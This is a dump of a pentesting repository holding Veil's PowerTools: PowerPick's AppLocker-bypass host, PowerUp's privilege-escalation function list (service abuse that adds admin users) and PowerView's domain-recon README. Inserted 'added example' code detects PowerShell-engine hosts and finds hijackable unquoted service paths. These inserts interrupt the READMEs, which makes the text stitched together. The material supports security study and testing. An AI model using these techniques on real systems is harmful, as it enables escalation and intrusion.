// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
```
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
```csharp
//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.18444
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace PowerPick.Properties {
    using System;


    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {

        private static global::System.Resources.ResourceManager resourceMan;

        private static global::System.Globalization.CultureInfo resourceCulture;

        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }

        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("PowerPick.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }

        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Get-Process.
        /// </summary>
        internal static string Script {
            get {
                return ResourceManager.GetString("Script", resourceCulture);
            }
        }
    }
}
```
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/Properties/Resources.resx:
--------------------------------------------------------------------------------
(XML stripped by extraction. Recoverable facts: the standard resx header (resmimetype text/microsoft-resx, version 2.0, reader System.Resources.ResXResourceReader and writer System.Resources.ResXResourceWriter from System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089) and a single string resource named Script whose value is `Get-Process`, i.e. the script that `PowerPick.exe -r Script` runs.)

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Debug/PowerPick.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Debug/PowerPick.vshost.exe
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Debug/PowerPick.vshost.exe.manifest:
--------------------------------------------------------------------------------
(XML stripped by extraction; nothing of the manifest's content survives.)
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.exe
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.pdb
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.Properties.Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.Properties.Resources.resources
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\bin\Release\PowerPick.exe
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\bin\Release\PowerPick.pdb
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.csprojResolveAssemblyReference.cache
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.Properties.Resources.resources
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.csproj.GenerateResource.Cache
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.exe
C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.pdb
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csproj.GenerateResource.Cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csproj.GenerateResource.Cache
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csprojResolveAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csprojResolveAssemblyReference.cache
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.exe
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.pdb
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/TempPE/Properties.Resources.Designer.cs.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/TempPE/Properties.Resources.Designer.cs.dll
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/README.md:
--------------------------------------------------------------------------------
Previously named InexorablePoSH. This repo contains a .NET application that provides the capability to work around an AppLocker blacklist on the PowerShell process. It uses the backend assemblies to load and execute PowerShell.

Many thanks to those in the offensive powershell community. This work is not ground breaking but hopefully will motivate offense and defense to understand the implications and lack of protections available.

If you have a really awesome use case, let me know!
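The AppLocker workaround above rests on one fact: the PowerShell engine is just System.Management.Automation.dll, and any .NET process can load it and open a runspace. The same fact gives defenders a cheap check, which the following added example (not part of PowerPick or PowerTools) demonstrates: walk every process, look for the engine assembly among its loaded modules, and flag hosts whose image name is not on an allow-list. The allow-list of expected host names is an assumption; adapt it to your environment.

```powershell
# Added example (not PowerPick's code): list processes that have loaded the
# PowerShell engine, flagging any that are not a known PowerShell host.
# A PowerPick-style binary shows up here because it loads
# System.Management.Automation.dll into its own (non-powershell.exe) process.

function Find-PowerShellEngineHost {
    [CmdletBinding()]
    param(
        # Assumed allow-list of image names that legitimately host the engine; adapt it.
        [string[]]$ExpectedHosts = @('powershell', 'powershell_ise', 'pwsh', 'wsmprovhost')
    )

    # On a warm system the engine usually appears as the native image (.ni.dll).
    $enginePattern = '^System\.Management\.Automation(\.ni)?\.dll$'

    foreach ($proc in Get-Process) {
        try {
            $modules = $proc.Modules
            $image   = $proc.MainModule.FileName
        } catch {
            # Protected or higher-integrity processes, and 32/64-bit mismatches, refuse
            # module enumeration; report it and keep going so coverage is partial, not zero.
            Write-Verbose "PID $($proc.Id) ($($proc.ProcessName)): cannot read modules: $($_.Exception.Message)"
            continue
        }

        $engine = $modules | Where-Object { $_.ModuleName -match $enginePattern } | Select-Object -First 1
        if (-not $engine) { continue }

        [PSCustomObject]@{
            ProcessName = $proc.ProcessName
            PID         = $proc.Id
            Image       = $image
            EngineDll   = $engine.FileName
            Expected    = [bool]($ExpectedHosts -contains $proc.ProcessName)
        }
    }
}

# Usage: show only the hosts you did not expect, e.g. a renamed PowerPick.exe.
Find-PowerShellEngineHost | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

Run it from a 64-bit, elevated PowerShell for the widest coverage, since module enumeration of 64-bit and protected processes fails otherwise (the function reports those with `-Verbose`). Two caveats: the check only sees processes that currently have the engine mapped, and it says nothing about what they ran. For the second question, controls that live in the engine rather than in powershell.exe still apply to a custom host when the engine it loads is version 5 or later, notably script block logging and AMSI, so PowerPick sidesteps a process-name allow-list, not the engine's own telemetry.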
## Man Page
    powerpick.exe [ ]
    flags:
    -f : Read script from specified file
    -r : Read script from specified resource
    -d : Read script from URL
    -a : Read script appended to current binary after specified delimiter. Delimiter should be very very unique string
    -c : PowerShell command to execute, enclosed in quotes (also accepted by the binary; see PrintHelp in Program.cs)

More details [here](https://github.com/Veil-Framework/PowerTools)

Developed by [@sixdub](https://twitter.com/sixdub)

Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools)

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerUp/PowerUp.psd1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerUp/PowerUp.psd1
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerUp/PowerUp.psm1:
--------------------------------------------------------------------------------
```powershell
# dot-source every .ps1 in the module folder so its functions are exported by the module
Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName }
```
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerUp/README.md:
--------------------------------------------------------------------------------
# PowerUp

PowerUp is a powershell tool to assist with local privilege escalation on
Windows systems. It contains several methods to identify and abuse
vulnerable services, as well as DLL hijacking opportunities, vulnerable
registry settings, and escalation opportunities.
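The unquoted-service-path check that PowerUp's service enumeration performs (Get-ServiceUnquoted, in the list that follows) comes down to parsing Win32_Service.PathName. The function below is an added example, not PowerUp's own code: it reproduces the check and goes one step further than a yes/no answer, listing for each affected service the file names the service control manager would try before the real binary, and whether the current account can create files in each of those directories. The writability probe creates and deletes an empty file, which is an assumption you may want to replace with a DACL read; the `.exe` suffix assumption for separating the binary from its arguments is also noted in the code.

```powershell
# Added example (not PowerUp's code): find services whose binary path is unquoted
# and contains a space, then list where a hijack binary would have to be dropped.

function Test-DirectoryWritable {
    # Probe by creating and deleting an empty file. Noisier than reading the DACL,
    # but it answers the question the operator actually has. Assumption: acceptable on your engagement.
    param([Parameter(Mandatory=$true)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    Get-WmiObject -Class Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if (-not $path) { return }

        # A path that is already quoted is not affected.
        if ($path.StartsWith('"')) { return }

        # Separate the executable from its arguments: everything up to the first ".exe".
        # Assumption: service binaries end in .exe; PathName values that do not are skipped.
        if ($path -notmatch '^(?<exe>.*?\.exe)(\s.*)?$') { return }
        $exe = $Matches['exe']
        if ($exe -notmatch ' ') { return }

        # CreateProcess resolves an unquoted command line by trying each space-delimited
        # prefix with ".exe" appended (C:\Program.exe, C:\Program Files\Foo.exe, ...),
        # so a writable directory along the path lets an attacker plant a binary that
        # is started instead of the real one.
        $candidates = foreach ($i in 0..($exe.Length - 1)) {
            if ($exe[$i] -eq ' ') { $exe.Substring(0, $i) + '.exe' }
        }

        foreach ($candidate in $candidates) {
            $dir = Split-Path -Parent $candidate
            [PSCustomObject]@{
                Service      = $svc.Name
                StartMode    = $svc.StartMode
                RunsAs       = $svc.StartName
                PathName     = $path
                HijackBinary = $candidate
                DirWritable  = Test-DirectoryWritable -Path $dir
            }
        }
    }
}

# Usage: only the paths that are actually exploitable from this account.
Get-UnquotedServicePath | Where-Object { $_.DirWritable } | Format-Table -AutoSize
```

An unquoted path is only a finding when one of the candidate directories is writable and the service runs as a more privileged account than yours (RunsAs) and can be restarted or will start at boot (StartMode), which is why the output carries all three.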
7 | 8 | Developed by [@harmj0y](https://twitter.com/harmj0y) 9 | 10 | Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools) 11 | 12 | 13 | ## Service Enumeration: 14 | Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name 15 | Get-ServiceEXEPerms - returns services where the current user can write to the service binary path 16 | Get-ServicePerms - returns services the current user can modify 17 | 18 | ## Service Abuse: 19 | Invoke-ServiceUserAdd - modifies a modifiable service to create a user and add it to the local administrators 20 | Write-UserAddServiceBinary - writes out a patched C# service binary that adds a local administrative user 21 | Write-ServiceEXE - replaces a service binary with one that adds a local administrator user 22 | Restore-ServiceEXE - restores a replaced service binary with the original executable 23 | 24 | ## DLL Hijacking: 25 | Invoke-FindDLLHijack - finds DLL hijacking opportunities for currently running processes 26 | Invoke-FindPathHijack - finds service %PATH% .DLL hijacking opportunities 27 | 28 | ## Registry Checks: 29 | Get-RegAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set 30 | Get-RegAutoLogon - checks for Autologon credentials in the registry 31 | 32 | ## Misc. 
Checks: 33 | Get-UnattendedInstallFiles - finds remaining unattended installation files 34 | Get-Webconfig - checks for any encrypted web.config strings 35 | Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords 36 | 37 | ## Helpers: 38 | Invoke-AllChecks - runs all current escalation checks and returns a report 39 | Write-UserAddMSI - write out a MSI installer that prompts for a user to be added 40 | Invoke-ServiceStart - starts a given service 41 | Invoke-ServiceStop - stops a given service 42 | Invoke-ServiceEnable - enables a given service 43 | Invoke-ServiceDisable - disables a given service 44 | Get-ServiceDetails - returns detailed information about a service 45 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerView/LICENSE: -------------------------------------------------------------------------------- 1 | PowerView is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2014, Will Schroeder 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerView/README.md:
--------------------------------------------------------------------------------
# PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

It also implements various useful metafunctions, including a port of [Rob Fuller's](https://twitter.com/mubix) [netview.exe](https://github.com/mubix/netview) tool, and some custom-written 'UserHunter' functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. See function descriptions for appropriate usage and available options.

To run on a machine, start PowerShell with "powershell -exec bypass" and then load the powerview script: PS> Import-Module .\powerview.ps1

For detailed output of underlying functionality, pass the -Debug flag to most functions.

For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.

Developed by [@harmj0y](https://twitter.com/harmj0y)

Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools)

Thanks to:
[@davidpmcguire](https://twitter.com/davidpmcguire) for inspiration,
[@mubix](https://twitter.com/mubix) for building netview.exe and open sourcing it,
[@obscuresec](https://twitter.com/obscuresec), [@mattifestation](https://twitter.com/mattifestation) and [darkoperator](https://twitter.com/Carlos_Perez) for examples and how to write proper PowerShell modules,
zeknox, smilingraccoon, and r3dy for the [local_admin_search_enum](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb) idea in Metasploit,
dunedinite, normanj, and powershellmagazine.com, for some (cited) examples to adapt and draw from


## Misc Functions:
Get-HostIP - resolves a hostname to an IP
Check-Write - checks if the current user can write to the specified file
Set-MacAttribute - sets MAC attributes for a file based on another file or input (from PowerSploit)
Invoke-CopyFile - copies a local file to a remote location, matching MAC properties
Test-Server - tests connectivity to a specified server
Get-UserProperties - returns all properties specified for users, or a set of user:prop names
Get-ComputerProperties - returns all properties specified for computers, or a set of computer:prop names
Get-LastLoggedOn - returns the last logged on user for a target host
Get-UserLogonEvents - returns logon events from the event log for a specified host
Get-UserTGTEvents - returns TGT request events for a specified host
Invoke-CheckLocalAdminAccess - checks if the current user context has local administrator access to a specified host
Invoke-SearchFiles - searches a local or remote path for files with specific terms in the name


## net * Functions:
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organizational units
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of local groups on a remote host or hosts
Get-NetLocalGroup - gets the members of a local group on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - gets a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returns the combined output of Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server


## User-Hunting Functions:
Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-UserHunterThreaded - threaded version of Invoke-UserHunter
Invoke-StealthUserHunter - finds all file servers utilized in user HomeDirectories, and checks the sessions on each file server, hunting for particular users
Invoke-UserProcessHunter - hunts for processes on domain machines running under specific target user accounts
Invoke-ProcessHunter - hunts for processes with a specific name on domain machines
Invoke-UserEventHunter - hunts for user logon events in domain controller event logs


## Domain Trust Functions:
Get-NetDomainTrusts - gets all trusts for the current user's domain
Get-NetDomainTrustsLDAP - gets all trusts for the current user's domain using just LDAP queries. This is less accurate than Get-NetDomainTrusts but allows you to relay all traffic through your primary DC.
Get-NetForestTrusts - gets all trusts for the forest associated with the current user's domain
Invoke-FindUserTrustGroups - enumerates users who are in groups outside of their principal domain
Invoke-FindAllUserTrustGroups - maps all domain trusts and enumerates all users who are in groups outside of their principal domain
Invoke-MapDomainTrusts - tries to build a relational mapping of all domain trusts
Invoke-MapDomainTrustsLDAP - tries to build a relational mapping of all domain trusts using Get-NetDomainTrustsLDAP


## MetaFunctions:
Invoke-Netview - a port of @mubix's netview.exe tool using Get-Net* functionality; finds all machines on the local domain and runs various enumeration methods on what it finds
Invoke-NetviewThreaded - threaded version of Invoke-Netview
Invoke-UserView - returns parsable session/loggedon user data for a given domain
Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
Invoke-ShareFinderThreaded - threaded version of Invoke-ShareFinder
Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
Invoke-FileFinderThreaded - threaded version of Invoke-FileFinder
Invoke-FindLocalAdminAccess - finds machines on the domain that the current user has local admin access to
Invoke-FindLocalAdminAccessThreaded - threaded version of Invoke-FindLocalAdminAccess
Invoke-UserFieldSearch - searches a user field for a particular term
Invoke-ComputerFieldSearch - searches a computer field for a particular term
Invoke-FindVulnSystems - finds systems likely vulnerable to MS08-067
Invoke-HostEnum - runs all available enumeration checks on a single host
Invoke-EnumerateLocalAdmins - enumerates members of the local Administrators groups across all machines in the domain
Invoke-EnumerateLocalAdminsThreaded - threaded version of Invoke-EnumerateLocalAdmins

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerView/powerview.psd1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerView/powerview.psd1
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerView/powerview.psm1:
--------------------------------------------------------------------------------
# Module loader: dot-sources every .ps1 file in the module directory so its functions are defined when the module is imported
Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName }
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/README.md:
--------------------------------------------------------------------------------
# PowerTools

Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.

Developed by [@harmj0y](https://twitter.com/harmj0y) and [@sixdub](https://twitter.com/sixdub)

--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ADExplorer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ADExplorer.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ADInsight.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ADInsight.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ADInsight.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ADInsight.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/AccessEnum.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/AccessEnum.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/AdExplorer.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/AdExplorer.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Autologon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Autologon.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Bginfo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Bginfo.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Cacheset.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Cacheset.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Clockres.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Clockres.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Contig.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Contig.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Coreinfo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Coreinfo.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/DISKMON.HLP:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/DISKMON.HLP
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/DMON.SYS:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/DMON.SYS
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Dbgview.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Dbgview.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Desktops.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Desktops.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Disk2vhd.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Disk2vhd.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/DiskView.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/DiskView.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Diskmon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Diskmon.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Eula.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Eula.txt
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/FindLinks.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/FindLinks.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Listdlls.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Listdlls.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/LoadOrd.exe:
--------------------------------------------------------------------------------
